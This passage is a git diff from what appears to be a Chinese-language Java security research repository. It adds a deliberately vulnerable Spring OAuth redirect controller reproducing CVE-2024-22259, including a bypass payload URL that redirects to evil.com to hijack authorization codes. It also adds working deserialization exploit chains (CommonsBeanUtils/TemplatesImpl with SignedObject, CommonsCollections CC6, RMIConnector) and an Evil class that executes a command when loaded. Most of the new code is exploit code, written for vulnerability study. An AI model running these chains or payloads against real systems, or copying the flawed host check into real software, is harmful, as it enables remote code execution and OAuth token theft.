+ * 如果在通过验证检查后使用该URL,则可能容易受到SSRF攻击。
+ * 这与CVE-2024-22243相同,这是另一种输入不同的情况。
+ *
+ * ### 修复方案
+ * 1. 将 org.springframework:spring-web 升级至 6.1.5 及以上版本
+ * 2. 将 org.springframework:spring-web 升级至 6.0.18 及以上版本
+ * 3. 将 org.springframework:spring-web 升级至 5.3.33 及以上版本
+ *
+ * ### 参考链接
+ * https://spring.io/security/cve-2024-22259
+ * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22259
+ *
+ */
+@Controller
+@RequestMapping("/oauth")
+public class OAuthController {
+
+ private static final Set<string> whiteDomains = new HashSet<strong>(Arrays.asList(new String[]{
+ ".fuckpdd.com"
+ }));
+
+ /**
+ * 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code
+ * 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2F%40www.fuckpdd.com%5B%40www.evil.com%2Ftou
+ *
+ *
+ * @param redirectUri [CVE-2024-22259] -> http://@www.fuckpdd.com[@www.evil.com/tou
+ * [CVE-2024-22243] -> http://www.fuckpdd.com[@www.evil.com/tou
+ * @return
+ */
+ @GetMapping
+ public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException {
+ UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build();
+ String schema = uriComponents.getScheme();
+ String host = uriComponents.getHost();
+ String path = uriComponents.getPath();
+
+ System.out.printf("schema:%s\n", schema);
+ System.out.printf("host:%s\n", host);
+ System.out.printf("path:%s\n", path);
+
+ boolean pass = false;
+ for (String whiteDomain : whiteDomains) {
+ if (host.endsWith(whiteDomain)) {
+ pass = true;
+ break;
+ }
+ }
+ if (!pass) return "error";
+
+ return "redirect:" + redirectUri;
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/test/java/com/drunkbaby/Cve202422259ApplicationTests.java b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/test/java/com/drunkbaby/Cve202422259ApplicationTests.java
new file mode 100644
index 00000000..93f3b2d0
--- /dev/null
+++ b/JavaSecurity/Spring/SpringFramework/CVE-2024-22259/src/test/java/com/drunkbaby/Cve202422259ApplicationTests.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202422259ApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git "a/JavaSecurity/Static_Analyze/2022351円225円277円345円237円216円346円235円257円/b4bycoffee-0.0.1-SNAPSHOT.jar" "b/JavaSecurity/Static_Analyze/2022351円225円277円345円237円216円346円235円257円/b4bycoffee-0.0.1-SNAPSHOT.jar"
new file mode 100644
index 00000000..a164bac7
Binary files /dev/null and "b/JavaSecurity/Static_Analyze/2022351円225円277円345円237円216円346円235円257円/b4bycoffee-0.0.1-SNAPSHOT.jar" differ
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/pom.xml b/JavaSecurity/Struts2/Struts2AndOGNL/pom.xml
index ccfcf87d..1d129a95 100644
--- a/JavaSecurity/Struts2/Struts2AndOGNL/pom.xml
+++ b/JavaSecurity/Struts2/Struts2AndOGNL/pom.xml
@@ -57,12 +57,12 @@
 <dependency>
 <groupid>org.apache.struts</groupid>
 <artifactid>struts2-core</artifactid>
- <version>2.0.8</version>
+ <version>2.5.32</version>
 </dependency>
 <dependency>
 <groupid>ognl</groupid>
 <artifactid>ognl</artifactid>
- <version>3.1.19</version>
+ <version>3.1.29</version>
 </dependency>
 </dependencies>
 
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/src/main/java/com/drunkbaby/OGNLGrammar/Test.java b/JavaSecurity/Struts2/Struts2AndOGNL/src/main/java/com/drunkbaby/OGNLGrammar/Test.java
new file mode 100644
index 00000000..644f51a9
--- /dev/null
+++ b/JavaSecurity/Struts2/Struts2AndOGNL/src/main/java/com/drunkbaby/OGNLGrammar/Test.java
@@ -0,0 +1,13 @@
+package com.drunkbaby.OGNLGrammar;
+
+import ognl.Ognl;
+import ognl.OgnlException;
+
+public class Test {
+ public static void main(String[] args) throws OgnlException {
+ String expression = "#{9*9}";
+ Object expr = Ognl.parseExpression(expression);
+ Object value = Ognl.getValue(expr, expression);
+ System.out.println(value);
+ }
+}
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/EvilCalc.class b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/EvilCalc.class
index f7ded7ab..793c044f 100644
Binary files a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/EvilCalc.class and b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/EvilCalc.class differ
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/Test.class b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/Test.class
new file mode 100644
index 00000000..37028c1e
Binary files /dev/null and b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/Test.class differ
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitContext.class b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitContext.class
index 534d84a8..5eab7dba 100644
Binary files a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitContext.class and b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitContext.class differ
diff --git a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitRoot.class b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitRoot.class
index 5da9ee63..c6922c79 100644
Binary files a/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitRoot.class and b/JavaSecurity/Struts2/Struts2AndOGNL/target/classes/com/drunkbaby/OGNLGrammar/VisitRoot.class differ
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/.gitignore" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/.gitignore"
new file mode 100644
index 00000000..5ff6309b
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/.gitignore"
@@ -0,0 +1,38 @@
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### IntelliJ IDEA ###
+.idea/modules.xml
+.idea/jarRepositories.xml
+.idea/compiler.xml
+.idea/libraries/
+*.iws
+*.iml
+*.ipr
+
+### Eclipse ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
+
+### Mac OS ###
+.DS_Store
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/pom.xml"
new file mode 100644
index 00000000..823878e5
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/pom.xml"
@@ -0,0 +1,45 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.example</groupid>
+ <artifactid>TwiceDeserialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ </parent>
+ <artifactid>CommonsBeanUtils</artifactid>
+ <name>Archetype - CommonsBeanUtils</name>
+ <url>http://maven.apache.org</url>
+
+ <dependencies>
+ <dependency>
+ <groupid>commons-beanutils</groupid>
+ <artifactid>commons-beanutils</artifactid>
+ <version>1.9.2</version>
+ </dependency>
+ 
+ <dependency>
+ <groupid>commons-collections</groupid>
+ <artifactid>commons-collections</artifactid>
+ <version>3.1</version>
+ </dependency>
+ 
+ <dependency>
+ <groupid>commons-logging</groupid>
+ <artifactid>commons-logging</artifactid>
+ <version>1.2</version>
+ </dependency>
+ </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>8</source>
+ <target>8</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/CommonsBeanUtilsEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/CommonsBeanUtilsEXP.java"
new file mode 100644
index 00000000..7285f67d
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/CommonsBeanUtilsEXP.java"
@@ -0,0 +1,71 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import org.apache.commons.beanutils.BeanComparator;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Base64;
+import java.util.PriorityQueue;
+
+public class CommonsBeanUtilsEXP {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ byte[] bytes= ClassPool.getDefault().get(Evil.class.getName()).toBytecode();
+
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][]{bytes});
+ setFieldValue(obj, "_name", "a");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ PriorityQueue queue1 = getpayload(obj, "outputProperties");
+
+ KeyPairGenerator kpg = KeyPairGenerator.getInstance("DSA");
+ kpg.initialize(1024);
+ KeyPair kp = kpg.generateKeyPair();
+ SignedObject signedObject = new SignedObject(queue1, kp.getPrivate(), Signature.getInstance("DSA"));
+
+ PriorityQueue queue2 = getpayload(signedObject, "object");
+
+ //序列化
+// ByteArrayOutputStream baos = new ByteArrayOutputStream();
+// ObjectOutputStream oos = new ObjectOutputStream(baos);
+// oos.writeObject(queue2);
+// oos.close();
+// System.out.println(new String(Base64.getEncoder().encode(baos.toByteArray())));
+ serialize(queue2);
+
+ //反序列化
+ deserialize("ser.bin");
+ }
+
+ public static PriorityQueue getpayload(Object object, String string) throws Exception {
+ BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
+ PriorityQueue priorityQueue = new PriorityQueue(2, beanComparator);
+ priorityQueue.add("1");
+ priorityQueue.add("2");
+ setFieldValue(beanComparator, "property", string);
+ setFieldValue(priorityQueue, "queue", new Object[]{object, null});
+ return priorityQueue;
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Calc.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/Evil.java"
similarity index 89%
rename from "JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Calc.java"
rename to "JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/Evil.java"
index e2742391..6db03202 100644
--- "a/JavaSecurity/345円217円215円345円272円217円345円210円227円345円214円226円345円237円272円347円241円200円/Reappearance/Serialable/src/DynamicClassLoader/URLClassLoader/Calc.java"
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/java/Evil.java"
@@ -1,5 +1,3 @@
-package src.DynamicClassLoader.URLClassLoader;
-
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
@@ -9,7 +7,7 @@
 import java.io.IOException;
 
 // 弹计算器的万能类
-public class Calc extends AbstractTranslet {
+public class Evil extends AbstractTranslet {
 static {
 try {
 Runtime.getRuntime().exec("calc");
@@ -27,4 +25,4 @@ public void transform(DOM document, SerializationHandler[] handlers) throws Tran
 public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
 
 }
-}
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..6c282754
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>CommonsBeanUtils</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..9fb51454
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
+ <artifactid>$CommonsBeanUtils</artifactid>
+ <version>1ドル.0-SNAPSHOT</version>
+ <dependencies>
+ <dependency>
+ <groupid>junit</groupid>
+ <artifactid>junit</artifactid>
+ <version>3.8.1</version>
+ <scope>test</scope>
+ </dependency>
+ </dependencies>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/main/java/App.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/main/java/App.java"
new file mode 100644
index 00000000..1fa6a956
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/main/java/App.java"
@@ -0,0 +1,13 @@
+package $org.example;
+
+/**
+ * Hello world!
+ *
+ */
+public class App 
+{
+ public static void main( String[] args )
+ {
+ System.out.println( "Hello World!" );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/test/java/AppTest.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/test/java/AppTest.java"
new file mode 100644
index 00000000..65be417e
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/CommonsBeanUtils/src/main/resources/archetype-resources/src/test/java/AppTest.java"
@@ -0,0 +1,38 @@
+package $org.example;
+
+import junit.framework.Test;
+import junit.framework.TestCase;
+import junit.framework.TestSuite;
+
+/**
+ * Unit test for simple App.
+ */
+public class AppTest 
+ extends TestCase
+{
+ /**
+ * Create the test case
+ *
+ * @param testName name of the test case
+ */
+ public AppTest( String testName )
+ {
+ super( testName );
+ }
+
+ /**
+ * @return the suite of tests being tested
+ */
+ public static Test suite()
+ {
+ return new TestSuite( AppTest.class );
+ }
+
+ /**
+ * Rigourous Test :-)
+ */
+ public void testApp()
+ {
+ assertTrue( true );
+ }
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/pom.xml"
new file mode 100644
index 00000000..636173d4
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/pom.xml"
@@ -0,0 +1,31 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <parent>
+ <groupid>org.example</groupid>
+ <artifactid>TwiceDeserialize</artifactid>
+ <version>1.0-SNAPSHOT</version>
+ </parent>
+ <artifactid>RMIConnector</artifactid>
+ <name>Archetype - RMIConnector</name>
+ <url>http://maven.apache.org</url>
+ <dependencies>
+ <dependency>
+ <groupid>commons-collections</groupid>
+ <artifactid>commons-collections</artifactid>
+ <version>3.2.1</version>
+ </dependency>
+ </dependencies>
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <configuration>
+ <source>8</source>
+ <target>8</target>
+ </configuration>
+ </plugin>
+ </plugins>
+ </build>
+</project>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/CC6EXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/CC6EXP.java"
new file mode 100644
index 00000000..15ac2566
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/CC6EXP.java"
@@ -0,0 +1,54 @@
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CC6EXP {
+ public static void main(String[] args) throws Exception {
+ Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(Runtime.class),
+ new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
+ new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
+ new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
+ new ConstantTransformer(1),
+ };
+
+ // 先使用fakeTransformer防止本地命令执行
+ Transformer transformerChain = new ChainedTransformer(fakeTransformers);
+
+ Map innerMap = new HashMap();
+ Map outerMap = LazyMap.decorate(innerMap, transformerChain);
+ TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "key");
+
+ Map objMap = new HashMap();
+ objMap.put(tiedMapEntry, "value");
+ outerMap.remove("key");
+
+ // 使用反射替换transformerChain的transformers
+ Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
+ f.setAccessible(true);
+ f.set(transformerChain, transformers);
+
+ serialize(objMap);
+
+ deserialize("ser.bin");
+ }
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException{
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+
+}
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/Evil.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/Evil.java"
new file mode 100644
index 00000000..6db03202
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/Evil.java"
@@ -0,0 +1,28 @@
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+
+import java.io.IOException;
+
+// 弹计算器的万能类
+public class Evil extends AbstractTranslet {
+ static {
+ try {
+ Runtime.getRuntime().exec("calc");
+ } catch (IOException e){
+ e.printStackTrace();
+ }
+ }
+
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/RMiConnectorEXP.java" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/RMiConnectorEXP.java"
new file mode 100644
index 00000000..14b0aa7f
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/java/RMiConnectorEXP.java"
@@ -0,0 +1,100 @@
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import javax.management.remote.JMXServiceURL;
+import javax.management.remote.rmi.RMIConnector;
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class RMiConnectorEXP {
+ public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
+ Field field = obj.getClass().getDeclaredField(fieldname);
+ field.setAccessible(true);
+ field.set(obj,value);
+ }
+
+ public static HashMap getObject() throws Exception{
+
+ Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(Runtime.class),
+ new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
+ new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
+ new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
+ new ConstantTransformer(1),
+ };
+
+ // 先使用fakeTransformer防止本地命令执行
+ Transformer transformerChain = new ChainedTransformer(fakeTransformers);
+
+ Map innerMap = new HashMap();
+ Map outerMap = LazyMap.decorate(innerMap, transformerChain);
+ TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap, "key");
+
+ HashMap objMap = new HashMap();
+ objMap.put(tiedMapEntry, "value");
+ outerMap.remove("key");
+
+ // 使用反射替换transformerChain的transformers
+ Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
+ f.setAccessible(true);
+ f.set(transformerChain, transformers);
+
+ return objMap;
+ }
+
+ public static void main(String[] args) throws Exception {
+ ByteArrayOutputStream tser = new ByteArrayOutputStream();
+ ObjectOutputStream toser = new ObjectOutputStream(tser);
+ toser.writeObject(getObject());
+ toser.close();
+
+ String exp= Base64.getEncoder().encodeToString(tser.toByteArray());
+
+ JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi://");
+ setFieldValue(jmxServiceURL, "urlPath", "/stub/"+exp);
+ RMIConnector rmiConnector = new RMIConnector(jmxServiceURL, null);
+
+ InvokerTransformer invokerTransformer = new InvokerTransformer("connect", null, null);
+
+ HashMap map = new HashMap<strong>();
+ Map lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
+ TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, rmiConnector);
+
+ HashMap expMap = new HashMap<strong>();
+ expMap.put(tiedMapEntry, "test");
+ lazyMap.remove(rmiConnector);
+
+ setFieldValue(lazyMap,"factory", invokerTransformer);
+
+ //序列化
+ serialize(expMap);
+
+ //反序列化
+ deserialize("ser.bin");
+ }
+
+ public static void serialize(Object obj) throws IOException {
+ ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+ oos.writeObject(obj);
+ }
+
+ public static Object deserialize(String Filename) throws IOException, ClassNotFoundException {
+ ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+ Object obj = ois.readObject();
+ return obj;
+ }
+
+}
\ No newline at end of file
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/META-INF/maven/archetype.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/META-INF/maven/archetype.xml"
new file mode 100644
index 00000000..fc2ef500
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/META-INF/maven/archetype.xml"
@@ -0,0 +1,9 @@
+<archetype>
+ <id>RMIConnector</id>
+ <sources>
+ <source>src/main/java/App.java</source>
+ </sources>
+ <testsources>
+ <source>src/test/java/AppTest.java</source>
+ </testsources>
+</archetype>
diff --git "a/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/pom.xml" "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/pom.xml"
new file mode 100644
index 00000000..29291cb7
--- /dev/null
+++ "b/JavaSecurity/Trick/344円272円214円346円254円241円345円217円215円345円272円217円345円210円227円345円214円226円/TwiceDeserialize/RMIConnector/src/main/resources/archetype-resources/pom.xml"
@@ -0,0 +1,15 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" + xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+ <modelversion>4.0.0</modelversion>
+ <groupid>$org.example</groupid>
